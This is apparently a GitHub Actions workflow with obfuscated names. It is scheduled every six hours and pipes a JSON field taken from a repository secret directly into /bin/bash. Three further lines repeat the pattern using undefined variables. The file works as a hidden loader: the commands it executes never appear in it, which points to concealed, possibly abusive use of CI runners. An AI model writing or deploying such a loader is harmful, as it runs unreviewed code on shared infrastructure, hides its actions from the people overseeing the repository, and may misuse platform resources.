name: kefanmin
on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'
jobs:  # 13446
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kefanmin
        env:
          dsjd0: ${{ secrets.dsjd0 }}
        run: |
          echo $dsjd0 | jq -r .ur78380 | /bin/bash
          echo $njufu7 | jq -r .cpy85 | /bin/bash
          echo $bgsum583 | jq -r .ocsat1 | /bin/bash
          echo $l844 | jq -r .jlzvh15 | /bin/bash

